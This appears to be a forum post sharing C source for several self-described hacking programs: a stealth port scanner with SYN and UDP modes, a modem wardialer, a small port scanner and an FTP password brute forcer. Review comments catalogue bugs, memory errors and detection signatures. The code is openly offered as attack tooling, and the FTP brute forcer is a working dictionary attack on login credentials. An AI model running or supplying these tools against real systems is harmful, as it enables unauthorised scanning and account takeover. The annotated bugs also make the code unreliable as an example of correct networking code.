
Full Version: Security Programs.
shaun2k2
Here I am posting most of the security auditing and hacking programs I've ever written, big and small. I wrote them all for Linux, but most of them you can edit to get them working without too much trouble on other platforms.

ALL of them are open source, I hope you find some use for them...



-=Rootscan=- Stealth port scanner.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <time.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <pthread.h>
struct timeval timeout;  /* connect()/recv() timeout for the TCP connect() scan; filled in by tcp_scan(), applied by try_tcp_port() */
#define MAX 1000         /* size of the HTTP banner buffer in try_tcp_port() */
#define GREEN ""         /* colour escapes are stubbed out to empty strings in this build */
#define RED ""
#define BLUE ""
#define TCP_SCAN 1       /* scan_type values selected by -t / -u / -s */
#define UDP_SCAN 2
#define SYN_SCAN 3
#define NO 0
#define YES 1
/* End of includes and defines */
/* Defining global variables, arrays and functions */
FILE *fp;                /* rootscan.log; opened by OpenFiles(), written by the udp/tcp workers, closed by CloseFiles() */
char file_to_open[60];   /* not referenced anywhere in this file */
int count = 0;           /* port the scan loop is currently on; shared, unsynchronised, with every worker thread */
int n_threads = 0;       /* incremented/decremented around pthread_create() but never read, so it caps nothing */
int start_port = 1;      /* -b */
int end_port = 65535;    /* -e */
int parallel = NO;       /* -p: one thread per port */
int verbose = NO;        /* -v */
int timeout_sec;         /* -c, in seconds; main() defaults it to 3 */
char *host_addr;         /* argv[1], the target exactly as given on the command line */
/* TCP pseudo-header used for the SYN-scan checksum in try_syn_port().
 * NOTE(review): `unsigned long` is 8 bytes on LP64 Linux, so with padding this
 * struct is 24 bytes there, not the 12-byte pseudo-header layout a TCP
 * checksum is defined over; fixed-width 32-bit address fields would pin it. */
struct pseudohdr  {
 unsigned long saddr;
 unsigned long daddr;
 char zer0;
 unsigned char protocol;
 unsigned short length;
};
/* Set prototypes: */
void usage(char progname[]);
void tcp_scan();
void udp();
void syn();
void *try_udp_port (void *);
void *try_tcp_port(void *);
void *try_syn_port(void *);
unsigned short in_cksum(unsigned short *addr,int len);
/* End of function prototypes */
/* OpenFiles(): create (truncate) rootscan.log, store its handle in the
 * global fp and write the banner. Exits the process with status 1 if the
 * file cannot be created. */
void OpenFiles()
{
 static const char *const banner[] = {
   "Rootscan was written by shaunige@yahoo.co.uk",
   "\nPorted to windows by : Eckz - mrx@netlane.com - http://eckz.cjb.net\n",
   "\nOptions added by : InvisibleGhost : i_t_rules@hotmail.com\n",
   "Testers/Bug Testers: Threadhead and Odins_Son\n",
   "\n******************************************************************",
   "\n ROOTSCAN LOG ",
   "\n******************************************************************\n",
 };
 const size_t n_lines = sizeof banner / sizeof banner[0];
 size_t i;

 fp = fopen("rootscan.log", "w");
 if (!fp) {
   printf(RED "File Open Error\n");
   exit(1);
 }
 /* The banner lines contain no conversion specifiers, so fputs() writes
  * exactly the bytes fprintf() used to. */
 for (i = 0; i < n_lines; i++) {
   fputs(banner[i], fp);
 }
}
/* End of OpenFiles() function */
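/* CloseFiles(): flush and close rootscan.log.
 * fclose() performs the final flush, so its result is checked and reported
 * instead of dropped; fp is reset to NULL so a repeated call, or a call
 * made before OpenFiles(), is a harmless no-op rather than fclose(NULL). */
void CloseFiles()
{
 if (fp == NULL)
   return;
 if (fclose(fp) != 0)
   perror("rootscan.log");
 fp = NULL;
}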
/* End of global variables, arrays and functions */
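/* Main function: parse the command line and dispatch to the selected scanner.
 *
 * argv[1] is the target host; getopt() parses the remaining arguments:
 *   -t / -s / -u   TCP connect() / SYN / UDP scan (default: TCP connect())
 *   -b N, -e N     first / last port to probe (defaults 1 and 65535)
 *   -c N           timeout in seconds for the connect() scan (default 3)
 *   -p             one thread per port
 *   -v             progress output
 *   -h             print usage (usage() exits)
 * Unknown options are ignored as before (getopt() prints its own diagnostic).
 * Exits with -1 when no host is given, when a numeric option is not a valid
 * in-range number, or when the port range is reversed. The original accepted
 * whatever atoi() returned, so "-b abc" silently scanned from port 0 and
 * "-e 99999" ran past the last valid port; it also left scan_type
 * uninitialised when none of -t/-s/-u was given.
 */

/* Parse one numeric option argument with strtol() and range-check it.
 * text is optarg, opt the option letter (used in the message), lo..hi the
 * inclusive range accepted. Exits with -1 on a malformed or out-of-range
 * value instead of silently yielding 0 the way atoi() does. */
static int parse_opt_num(const char *text, int opt, long lo, long hi)
{
 char *end = NULL;
 long value;

 errno = 0;
 value = strtol(text, &end, 10);
 /* end == text: no digits at all; *end != '\0': trailing junk such as "80x". */
 if (end == text || *end != '\0' || errno == ERANGE || value < lo || value > hi) {
   printf(RED "Invalid value for -%c: \"%s\" (expected %ld..%ld)\n", opt, text, lo, hi);
   exit(-1);
 }
 return (int)value;
}

int main(int argc, char *argv[])
{
 int ch;                    /* int, not char: getopt() returns -1, which a char cannot hold portably */
 int scan_type = TCP_SCAN;  /* default scan, matching the `default:` arm of the dispatch below */
 /* Check args, and print a message if wrong */
 if(argc < 2) {
   usage(argv[0]);
   exit(-1);
 }
 /*Set host address*/
 host_addr = argv[1];
 /* Check command line arguments, and set variables appropriately */
 timeout_sec = 3;
 while ((ch = getopt(argc, argv, "sutpvhb:e:c:")) != -1) {
   switch (ch)
     {
     case 's':
       scan_type = SYN_SCAN;
       break;
     case 'u':
       scan_type = UDP_SCAN;
       break;
     case 't':
       scan_type = TCP_SCAN;
       break;
     case 'b':
       start_port = parse_opt_num(optarg, ch, 1, 65535);
       break;
     case 'e':
       end_port = parse_opt_num(optarg, ch, 1, 65535);
       break;
     case 'p':
       parallel = YES;
       break;
     case 'c':
       timeout_sec = parse_opt_num(optarg, ch, 0, INT_MAX);
       break;
     case 'v':
       verbose = YES;
       break;
     case 'h':
       usage(argv[0]);
       break;
     default:
       break;
     }
 }
 /* Each end is individually valid here; a reversed range would make every
  * scan loop a no-op that still reports completion. */
 if (start_port > end_port) {
   printf(RED "Start port %d is greater than end port %d\n", start_port, end_port);
   exit(-1);
 }
 if (verbose == YES) printf("Scanning host: %s\n", host_addr);
 if (verbose == YES && parallel == YES) printf("Going into parallel mode.\n");
 switch (scan_type)
   {
   case TCP_SCAN:
     tcp_scan();
     break;
   case UDP_SCAN:
     udp();
     break;
   case SYN_SCAN:
     syn();
     break;
   default:
     tcp_scan();
     break;
   }
 return 0;
} /* End of main() */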
/* UDP scanning function:
 * This function was a quick hack, and will probably need some editing to work.
 *
 * Resolves host_addr, opens rootscan.log and probes start_port..end_port via
 * try_udp_port(), one thread per port when parallel == YES, otherwise
 * sequentially. The port is handed to the worker as an int cast to void *.
 *
 * NOTE(review): pthread_detach(thread_t) runs on an uninitialised pthread_t
 * before pthread_create() — undefined behaviour; the created thread itself
 * is never detached or joined.
 * NOTE(review): the worker logs the global `count`, not its port argument,
 * so under -p results can be attributed to whichever port the loop has moved
 * on to. n_threads is counted but never read, so nothing bounds the number
 * of concurrent threads.
 */
void udp()
{
 if (verbose == YES) printf("Beginning udp scan from: %d to: %d\n", start_port, end_port);
 if((gethostbyname(host_addr)) == NULL)
   {
     printf(RED "Couldn't resolve %s\n", host_addr);
     exit(-1);
   }
 OpenFiles();
 for(count = start_port; count <= end_port; count++)
   {
     if (parallel == YES)
       {
         pthread_t thread_t;
         pthread_detach(thread_t);
         n_threads++;
         /* A failed pthread_create() steps count back so the same port is retried. */
         if (pthread_create(&thread_t, NULL, try_udp_port, (void *)count))
           {
             count--;
             n_threads--;
           }
       }
     else
       {
         try_udp_port((void *)count);
       }
     if (verbose == YES) printf("\rPort: %d\r", count);
   }
 CloseFiles();
}

/* TCP connect() scan of start_port..end_port against host_addr.
 * Prints the column header, opens rootscan.log, fills in the socket timeout
 * used by try_tcp_port() and probes each port, threaded when parallel == YES.
 * Every probe is a full three-way handshake followed by close(), so each port
 * touched can register as a completed connection on the target — of the
 * three modes this is the easiest one for the far side to see in its logs.
 *
 * NOTE(review): timeout.tv_usec is set to timeout_sec, i.e. a handful of
 * microseconds; presumably 0 was intended, the seconds field already carries
 * the value.
 * NOTE(review): pthread_detach() is applied to an uninitialised pthread_t
 * before pthread_create() (undefined behaviour) and the created thread is
 * never detached or joined. */
void tcp_scan() {
 if (verbose == YES) printf("Beginning tcp connect() scan from: %d to: %d\n", start_port, end_port);
 if((gethostbyname(host_addr)) == NULL)
   {
     printf(RED "Couldn't resolve %s\n", host_addr);
     exit(-1);
   }
 printf(BLUE "\t\tPort\t\tState\t\tService\n\n");
 /* Start for loop to connect to each port */
 OpenFiles();

 timeout.tv_sec = timeout_sec;
 timeout.tv_usec = timeout_sec;

 for(count = start_port; count <= end_port; count++)
   {
     if (parallel == YES)
       {
         pthread_t thread_t;
         pthread_detach(thread_t);
         n_threads++;
         /* A failed pthread_create() steps count back so the same port is retried. */
         if (pthread_create(&thread_t, NULL, try_tcp_port, (void *)count))
           {
             count--;
             n_threads--;
           }
       }
     else      {
       try_tcp_port((void *)count);
     }
   }/* End the for loop */
 printf(BLUE "\n\nScan complete!\n\n");
 /* Close the file */
 CloseFiles();
}  /* End function */

/* SYN ("half-open") scan of start_port..end_port.
 * Resolves host_addr, opens rootscan.log and calls try_syn_port() per port,
 * threaded when parallel == YES. Each probe needs a raw socket with
 * IP_HDRINCL (try_syn_port() exits if it cannot get one), so in practice this
 * mode runs as root / with CAP_NET_RAW.
 *
 * NOTE(review): OpenFiles() is called but CloseFiles() never is on this path,
 * so rootscan.log is only flushed when the process exits.
 * NOTE(review): same uninitialised pthread_detach() as the other two scan
 * loops; the created thread is never detached or joined. */
void syn() {
 if (verbose == YES) printf("Beginning syn stealth scan from: %d to: %d\n", start_port, end_port);
 if((gethostbyname(host_addr)) == NULL) {
   printf(RED "Couldn't resolve %s!\n", host_addr);
   exit(-1);
 }
 OpenFiles();
 printf(BLUE "\t\tPort\t\tState\t\tService\n\n");
 for(count = start_port; count <= end_port; count++) {
   if (parallel == YES)
     {
       pthread_t thread_t;
       pthread_detach(thread_t);
       n_threads++;
       /* A failed pthread_create() steps count back so the same port is retried. */
       if (pthread_create(&thread_t, NULL, try_syn_port, (void *)count))
         {
           count--;
           n_threads--;
         }
     }
   else
     {
       try_syn_port((void *)count);
     }
 }  /* End for() */
}  /* End function */

/* Worker for the UDP scan: send one datagram to `port`, then wait for a reply.
 * tmp is the port number cast to void *. The function has no return
 * statement, so its void * result is indeterminate (callers never use it).
 * Heuristic used: anything recvfrom() reports as an error is logged as
 * Closed, anything received as Open.
 *
 * NOTE(review): sendto() and recvfrom() are given &udp_host — the address of
 * the `struct hostent *` variable — as the sockaddr argument; the udp_dest
 * filled in below is never passed to either call.
 * NOTE(review): no SO_RCVTIMEO is set on this socket (unlike the TCP worker),
 * so recvfrom() can block indefinitely when nothing answers.
 * NOTE(review): results are logged with the global `count`, not `port`, so
 * under -p the port written to the log may be a different one.
 * NOTE(review): close(sock) runs twice on both branches; under -p the second
 * close() can hit a descriptor another thread has just opened.
 * strlen() is used without <string.h>. */
void *try_udp_port(void *tmp)
{
 int port = (int)(tmp);
 int sock;
 struct hostent *udp_host;
 struct sockaddr_in udp_dest;
 char udp_data[] = "hello\0";   /* strlen() stops at the first NUL, so 5 bytes are sent */
 int udp_len = strlen(udp_data);
 char udp_buf[20];
 int sin_len = sizeof(struct sockaddr);
 if((udp_host = gethostbyname(host_addr)) == NULL)
   {
     printf(RED "Couldn't resolve %s\n", host_addr);
     exit(-1);
   }

 /* Create a SOCK_DGRAM socket instead, SOCK_DGRAM is UDP socket */
 if((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
   {
     printf(RED "Couldn't create datagram socket!\n");
     exit(-1);
   }
 /* Fill in address structs. */
 udp_dest.sin_family = AF_INET;
 udp_dest.sin_port = htons(port);
 udp_dest.sin_addr = *((struct in_addr *)udp_host->h_addr);
 /* Send the datagram. */
 sendto(sock, udp_data, udp_len, 0, (struct sockaddr *)&udp_host, sizeof(struct sockaddr));
 /* If we get a reply, the port is probably closed. */
 if(recvfrom(sock, udp_buf, 19, 0, (struct sockaddr *)&udp_host, &sin_len) < 0) {
   close(sock);
   fprintf(fp, "Port %d \t Closed\n", count);
 }
 /* If we received no response, the port is probably open. */
 else {
   printf(RED "Port %d \t Open\n", count);
   close(sock);
   fprintf(fp, "Port %d \t Open\n", count);
 }
 close(sock);
}

/* Worker for the connect() scan: open a TCP connection to `port` on host_addr.
 * tmp is the port number cast to void *. A failed connect() is logged as
 * Closed; a successful one is printed and logged together with the
 * getservbyport() name, then the socket is closed. On port 80 it asks on
 * stdin whether to send `HEAD / HTTP/1.0` and echoes the raw response.
 * No return statement, so the void * result is indeterminate.
 *
 * NOTE(review): socket() returns -1 on error, as the comment below says, but
 * the test is `== 0`, so a failed socket() is not caught.
 * NOTE(review): the recv() length is ignored and httpbuf is never
 * NUL-terminated, so the "%s" printf/fprintf read past the received bytes.
 * NOTE(review): every connect() failure is logged as Closed; errno is not
 * examined, so a refused port, a timeout and an unreachable host all look
 * the same. The interactive scanf() prompt also fires from inside worker
 * threads under -p, and gethostbyname() (static state, not guaranteed
 * thread-safe) is called once per port.
 * strlen() is used without <string.h>. */
void *try_tcp_port (void *tmp)
{
int port = (int)(tmp);
int sock = 0;
char http;
char httpsend[18] = "HEAD / HTTP/1.0\n\n";   /* 17 characters + NUL */
char httpbuf[MAX];
struct hostent *tcp_host;
struct sockaddr_in tcp_dest;
struct servent *serv;
if (verbose == YES) printf("Port: %d\r", port);
if((tcp_host = gethostbyname(host_addr)) == NULL)
{
printf(RED "Couldn't resolve %s\n", host_addr);
exit(-1);
}
/* Creating the socket, with the integer variable called sock, checking if it succeeded, socket() returns -1 on error */
if((sock = socket(AF_INET, SOCK_STREAM, 0)) == 0)
{
printf(RED "Couldn't make socket!\n");
exit(-1);
}

/* Both directions use the timeout tcp_scan() filled in from -c. */
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout));
setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (const char*)&timeout, sizeof(timeout));

/* Setting up the sockaddr_in struct with connection details, port, 'family', hostname/IP address */
tcp_dest.sin_family = AF_INET;
tcp_dest.sin_port = htons(port);
tcp_dest.sin_addr = *((struct in_addr *)tcp_host->h_addr);
/* Connecting the sock to the host on the port the for loop is up to */
if (connect(sock , (struct sockaddr *)&tcp_dest, sizeof(struct sockaddr)) == -1)
{
fprintf( fp ,"Port %5d Closed\n", port);
close(sock);
}
else {
 /* Get the service name the port is likely to be. */
 serv = getservbyport(htons(port), "tcp");
 printf(RED "\t\t%d \t\t Open \t\t %s\n", port, (serv == NULL) ? "UNKNOWN" : serv->s_name);
 fprintf( fp ,"Port %5d Open \t %s\n", port, (serv == NULL) ? "UNKNOWN" : serv->s_name);
 /* If the variable the for loop is using equals 80, they might be running a web server, get the version? */
 if(port == 80)
   {
     printf(GREEN "\n\nThe host is running a HTTP server, get HTTPD version? [y/n]");
       scanf("%c", &http);
       if(http == 'y')
       {
     fprintf(fp,"\nHTTP version response:\n");
     /* Sending HEAD / HTTP/1.0\n\n to get the version. */
     send(sock, httpsend, strlen(httpsend), 0);
     /* Receiving the result, store it in httpbuf (return value, and hence the byte count, is dropped) */
     recv(sock, httpbuf, MAX-1, 0);
     /* Print it to stdout (monitor) */
     printf("%s", httpbuf);
     /* Print it to the file */
     fprintf(fp, "%s", httpbuf);
     }
   }
 /* Close the socket */
 close(sock);
}
}

/* Worker for the SYN scan: build one IP+TCP SYN by hand, send it to `port`
 * on a raw socket, read one packet back and classify it.
 * Needs a raw IPPROTO_TCP socket with IP_HDRINCL (root / CAP_NET_RAW); the
 * process exits if either call fails. SYN/ACK back => printed as Open,
 * RST => nothing printed. No return statement (void * result indeterminate).
 *
 * NOTE(review): `packet` is malloc'd as iphdr+tcphdr bytes, but `pseudo` is
 * pointed at packet+iphdr+tcphdr — one past the end of that allocation. The
 * five pseudo-header stores below therefore write past the heap block, and
 * the in_cksum() call over tcphdr+pseudohdr reads the same out-of-bounds
 * bytes. Both malloc() results are unchecked and neither is freed (one leak
 * per port probed).
 * NOTE(review): the source address is hard-coded ("Change the IP address
 * here"). The target answers to that address, so the recvfrom() below only
 * sees the reply when it happens to be this host's own address.
 * NOTE(review): a raw IPPROTO_TCP socket is handed every TCP segment that
 * reaches this host, so the single recvfrom() may return an unrelated
 * segment — the printed port is taken from that segment's source field —
 * and it blocks indefinitely if nothing arrives.
 * NOTE(review): `tcphr->rst = 1` on the RST branch is an assignment, not a
 * comparison, so that branch always matches and the "Protocol violation"
 * branch is unreachable.
 * time() and bzero() are used without <time.h>/<strings.h>.
 * Detection note: half-open probes from a fixed source port (8901) with no
 * completing ACK are a simple pattern for an IDS or connection tracker. */
void *try_syn_port(void *tmp)
{
 int port = (int)(tmp);
 int sock;
 struct hostent *h = gethostbyname(host_addr);   /* result not checked for NULL here */
 /* the variables */
 int on=1;
 int ssize = sizeof(struct sockaddr_in);
 int packet_size = (sizeof(struct tcphdr)+sizeof(struct iphdr));
 char *packet = malloc(packet_size);
 char *received = malloc(packet_size);
 /* The headers */
 struct tcphdr *tcph = (struct tcphdr *)(packet+sizeof(struct iphdr));
 struct pseudohdr *pseudo = (struct pseudohdr *)(packet+sizeof(struct iphdr)+sizeof(struct tcphdr));
 struct iphdr *iph   = (struct iphdr  *)(packet);
 struct tcphdr *tcphr;
 struct iphdr *iphr;

 struct sockaddr_in local;
 struct sockaddr_in remote;
 struct in_addr saddr, daddr;
 struct servent *serv;
 /* making socket, and telling kernel we fill in the ip header */
 if( (sock = socket( PF_INET, SOCK_RAW, IPPROTO_TCP)) < 0 )
   { perror("socket");  exit(1); }

 if( (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0 )
   { perror("setsockopt");  exit(1); }

 daddr = *((struct in_addr *)h->h_addr);
 saddr.s_addr = inet_addr("62.254.68.38"); /* Change the IP address here. */
 /***********************/
 /* The pseudo header for the checksum */
 pseudo->saddr = saddr.s_addr;
 pseudo->daddr = daddr.s_addr;
 pseudo->protocol = IPPROTO_TCP;
 pseudo->zer0 = 0;
 pseudo->length = htons(sizeof(struct tcphdr));


 bzero( packet, packet_size );

 tcph->source = htons(8901);
 tcph->dest   = htons(port);
 tcph->seq    = htonl(random()%time(NULL));
 tcph->ack_seq= htonl(random()%time(NULL));
 tcph->doff = 5;
 tcph->res1 = 0;
 tcph->fin = 0;
 tcph->syn = 1;
 tcph->rst = 0;
 tcph->psh = 0;
 tcph->ack = 0;
 tcph->urg = 0;
 tcph->window = htons(12000);
 tcph->check = (unsigned short)in_cksum((unsigned short *)tcph, sizeof(struct tcphdr)+sizeof(struct pseudohdr));

 bzero(packet, sizeof(struct iphdr));

 iph->ihl = 5;
 iph->version = 4;
 iph->tos = 0;
 iph->tot_len = htons(packet_size);
 iph->frag_off = 0;
 iph->ttl = IPDEFTTL;
 iph->protocol = IPPROTO_TCP;
 /* Checksum is taken before saddr/daddr are filled in, so it covers zeroed address fields. */
 iph->check = (unsigned short)in_cksum((unsigned short *)iph, sizeof(struct iphdr));
 iph->saddr = saddr.s_addr;
 iph->daddr = daddr.s_addr;

 remote.sin_family = PF_INET;
 remote.sin_addr = daddr;
 remote.sin_port = htons(port);



 if( (sendto(sock, packet, packet_size, 0x0, (struct sockaddr *)&remote, sizeof(remote))) < 0 )
   {  perror("sendto");  exit(1);  }


 bzero( packet, packet_size );
 if( (recvfrom(sock, received, packet_size, 0x0, (struct sockaddr *)&local, &ssize )) < 0 )
   {  perror("recvfrom"); exit(1); }

 iphr = (struct iphdr *)(received);
 tcphr = (struct tcphdr *)(received+(int)((iphr->ihl)*4)); /* using fixed sizes can be tricky, so i dont;) */

 if( tcphr->syn == 1 && tcphr->ack == 1 ) /* SYN/ACK */
   {
serv = getservbyport(htons(port), "tcp");
 printf("\t\t%d \t\t Open \t\t %s\n", ntohs(tcphr->source), (serv == NULL) ? "UNKNOWN" : serv->s_name);
                 }

 else if( tcphr->rst = 1 ) /* RST */
   {
     printf(""); /* anyone a suggestion what could be done here ? */
   }
 else /* This shouldnt happen */
   {
     printf("Protocol violation :P\n");
     exit(-2);
   }

 close(sock);
}

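/* The checksum function from the raw ip faq.
 *
 * Standard Internet checksum (RFC 1071) over `len` bytes at `addr`: the
 * one's complement of the one's-complement sum of the 16-bit words as they
 * sit in memory. An odd trailing byte is treated as a word whose second byte
 * is zero. Because the words are summed in memory order, the result can be
 * stored straight into a header field without byte-swapping, and a buffer
 * that already carries a correct checksum sums to 0.
 * A non-positive len yields 0xFFFF (nothing summed). The caller is
 * responsible for `addr` being readable for `len` bytes.
 *
 * Behaviour is identical to the original; this version drops the obsolete
 * `register`/u_short/u_char spellings, uses a fixed-width accumulator so the
 * fold does not depend on the width of int, and fetches the odd byte with
 * memcpy() instead of a byte-pointer cast. */
unsigned short in_cksum(unsigned short *addr, int len)
{
 uint32_t sum = 0;
 const unsigned short *w = addr;
 int nleft = len;

 /* Sum whole words; carries pile up above bit 15 and are folded back below. */
 while (nleft > 1) {
   sum += *w++;
   nleft -= 2;
 }

 /* Odd trailing byte: put it in the first byte of a zeroed word so it
  * contributes in the same position it occupies in memory. */
 if (nleft == 1) {
   unsigned short last = 0;
   memcpy(&last, w, 1);
   sum += last;
 }

 sum = (sum >> 16) + (sum & 0xffff);  /* fold the 32-bit sum to 16 bits */
 sum += (sum >> 16);                  /* fold the carry that step may produce */
 return (unsigned short)~sum;
}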

/* usage(): print the synopsis, credits and option summary to stdout, then
 * exit with status -1. Never returns. progname is echoed into the synopsis
 * line. */
void usage(char *progname) {
 static const char *const help[] = {
   "\n\nRootscan was written by shaunige@yahoo.co.uk,\nEckz - mrx@netlane.com - http://freewebs.com/bh_x,\n",
   "InvisibleGhost : i_t_rules@hotmail.com,\nand Ozzy.\nBug testers: Threadhead and Odins_Son, p4n_n0s.\n",
   "\n\t-u : Scan for UDP Ports\n",
   "\tUDP scanning option is currently experimental.\n",
   "\t-s : Scan using SYN scanning (stealthy).\n",
   "\t-t : Scan using TCP connect() scanning (default).\n",
   "\t-p : Scan in parallel mode, using threads (faster in some cases)\n",
   "\t-b number: start scanning at port number. (default = 1)\n",
   "\t-e number: stop scanning at port number. (default = 65535)\n",
   "\t-c number: Set connect() timeout (default = 3, \n\tcurrently only affects tcp connect() scan.)\n",
   "\t-v: Be verbose (mostly for debugging or checking speed)\n\n",
 };
 size_t i;

 printf(RED "Usage: %s <host/ip> [-tsu] [-p] [-b number] [-e number] [-c number] [-v]\n", progname);
 /* RED cannot be glued to a non-literal, so it goes through its own "%s";
  * the bytes written are the same as with the literal form. */
 for (i = 0; i < sizeof help / sizeof help[0]; i++) {
   printf("%s%s", RED, help[i]);
 }
 exit(-1);
}  /* End function */



-=Rootdial=- Minimalistic wardialer.

CODE

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
/* May need to change this */
#define MODEM_PORT "/dev/modem"
#define GREEN "\E[32m"
#define RED "\E[31m"
#define BLUE "\E[34m"
/* Rootdial: dial every number from the start to the end value typed on stdin
 * through the modem on MODEM_PORT and report which ones answer with a carrier
 * ("CONNECT" in the modem's reply).
 * Per number: reset (ATZ), dial (ATDT<n>), wait 25 s, read the reply twice,
 * then hang up (+++ATH0) on both branches. Returns 0 once the range is done.
 *
 * NOTE(review): open() returns -1 on failure, not NULL, so a missing modem is
 * not detected and every write()/read() below then fails unchecked.
 * NOTE(review): write(modemfd, num_buf, 17) sends 17 bytes regardless of the
 * formatted command's length, so trailing uninitialised stack bytes go to
 * the modem; con_buf is never NUL-terminated before strstr().
 * system("clear") spawns a shell and resolves `clear` through PATH.
 * system(), exit(), sleep(), write() and read() are used without
 * <stdlib.h>/<unistd.h>; the scanf("%d") results are unchecked. */
int main() {
       int snum;
       int endnum;
       unsigned int i;
       int modemfd;
       char con_buf[15];
       system("clear");
       printf(BLUE "--------------------------------------------------------------------------------\n");
       printf(RED "\t\tRootdial v3.1 was written by shaunige@yahoo.co.uk\n");
       printf(BLUE "--------------------------------------------------------------------------------\n\n");
       printf(BLUE "Enter start number: ");
       scanf("%d", &snum);
       printf(BLUE "Enter end number: ");
       scanf("%d", &endnum);

       if((modemfd = open(MODEM_PORT, O_RDWR | O_NOCTTY | O_NDELAY)) == NULL) {
               printf(RED "Couldn't open modem\n");
               exit(-1);
       }
       for(i = snum; i <= endnum; i++) {
               char num_buf[20];
               sprintf(num_buf, "ATDT%d\r", i);
               write(modemfd, "ATZ\r", 4);
               write(modemfd, num_buf, 17);
               printf(BLUE "\n\nDialing %d...\n", i);
               printf(BLUE "Checking for carrier...\n");
               sleep(25);
               /* Two reads into the same buffer: only the second one is inspected. */
               read(modemfd, con_buf, 14);
               read(modemfd, con_buf, 14);
               if(strstr(con_buf, "ONNECT") != NULL) {
                       printf(GREEN "*** CONNECT ***\nCarrier found on %d!\n", i);
               write(modemfd, "+++ATH0\r", 8);
               }

               else {
                       write(modemfd, "+++ATH0\r", 8);
       printf(RED "Carrier not found on %d\n", i);
               }
       }

       printf(BLUE "\nScan complete.\n");
return(0);
}



-=TinyScan=- Minimalistic port scanner, little brother of rootscan.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
/* TinyScan: TCP connect() scan of argv[1] from port argv[2] to argv[3].
 * One socket per port; a successful connect() prints "Port N Open", a
 * failed one is silent. Every probe completes a full handshake, so each
 * open port also registers as a connection on the target. Returns 0.
 *
 * NOTE(review): atoi(argv[3]) is re-evaluated on every iteration and neither
 * bound is range-checked (atoi() yields 0 for non-numeric input).
 * close() is used without <unistd.h>; system("clear") spawns a shell. */
int main(int argc, char *argv[]) {
       if(argc < 4) {
               system("clear");
               printf("Usage: %s <host/ip address> <start_port> <end_port>\n", argv[0]);
               printf("TinyScan was written by shaunige@yahoo.co.uk\n");
               exit(-1);
       }

       int sock;
       int count;
       struct sockaddr_in dest;
       struct hostent *he;
       if((he = gethostbyname(argv[1])) == NULL) {
               printf("Couldn't resolve %s\n", argv[1]);
               exit(-1);
       }

       for(count = atoi(argv[2]); count <= atoi(argv[3]); count++) {
       if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
               printf("Couldn't create socket!\n");
               exit(-1);
       }
       dest.sin_family = AF_INET;
       dest.sin_port = htons(count);
       dest.sin_addr = *((struct in_addr *)he->h_addr);
       /* Any connect() failure (refused, timed out, unreachable) is treated alike: nothing printed. */
       if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
               close(sock);
       }

       else {
               printf("Port %d\tOpen\n", count);
               close(sock);
       }
       }

       printf("Scan complete.\n");
       return(0);
}



-=FTPBrute=- Quick FTP brute forcer.

CODE

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
/* FTPBrute: dictionary attack on one FTP login.
 * Reads host, user name and wordlist path from stdin, then for every word
 * opens a fresh TCP connection to port 21, sends USER and PASS and treats a
 * "230" anywhere in the reply as a hit. Returns 0 in both outcomes.
 *
 * Server side this is one new connection per attempt from the same source,
 * each ending in a failed login — auth-failure logging, per-source rate
 * limits and lockout after N failures are the standard detections and
 * mitigations.
 *
 * NOTE(review): scanf("%s") into dhost[20], victim[10] and plist[15] has no
 * width limit, so longer input overflows the stack buffers; fscanf("%s")
 * into pass[15] likewise. `char msg[3] = "331"` has no room for the
 * terminator and is never used. send() is given sizeof(user_buf) and
 * sizeof(pass_buf) rather than the string lengths, so bytes past the command
 * are transmitted. recv() results are ignored and get_buf is never
 * terminated before strstr(). The while(!feof()) loop handles the last word
 * twice, and the close(sock) after return(0) is unreachable.
 * system("clear") spawns a shell; strstr()/close() are used without
 * <string.h>/<unistd.h>. */
int main() {
       int sock;
       char pass[15];
       char get_buf[1024];
       char pass_buf[30];
       char user_buf[25];
       char plist[15];
       char dhost[20];
       char victim[10];
       char msg[3] = "331";
       struct sockaddr_in dest;
       struct hostent *host;
       FILE *pwdlist;
       system("clear");
       printf("FTPBrute, FTP Brute forcer - shaunige@yahoo.co.uk\n\n");
       printf("Host: ");
       scanf("%s", dhost);
       printf("Login to brute force: ");
       scanf("%s", victim);
       printf("Dictionary File: ");
       scanf("%s", plist);
       if((host = gethostbyname(dhost)) == NULL) {
               printf("Couldn't resolve %s\n!", dhost);
               exit(-1);
       }

       if((pwdlist = fopen(plist, "r")) == NULL) {
               printf("Couldn't open file: %s!\n", plist);
               exit(-1);
       }

       sprintf(user_buf, "USER %s\n", victim);
       while(!feof(pwdlist)) {
               fscanf(pwdlist, "%s", pass);
               sprintf(pass_buf, "PASS %s\n", pass);
               if((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                       printf("Couldn't make socket!\n");
                       exit(-1);
               }

               dest.sin_family = AF_INET;
               dest.sin_port = htons(21);
               dest.sin_addr = *((struct in_addr *)host->h_addr);

               if(connect(sock, (struct sockaddr *)&dest, sizeof(struct sockaddr)) == -1) {
                       printf("Couldn't connect to %s on port 21!\n", dhost);
                       exit(-1);
               }
               printf("Trying: %s\n", pass);
               recv(sock, get_buf, sizeof(get_buf), 0);
               send(sock, user_buf, sizeof(user_buf), 0);
               recv(sock, get_buf, sizeof(get_buf), 0);
               send(sock, pass_buf, sizeof(pass_buf), 0);
               recv(sock, get_buf, sizeof(get_buf), 0);
               if(strstr(get_buf, "230") != NULL) {
                       printf("\nThe password is: %s.\n", pass);
                       return(0);
                       close(sock);
               }
       close(sock);
       }
       fclose(pwdlist);
       printf("Couldn't brute force password.\n");
       return(0);
}



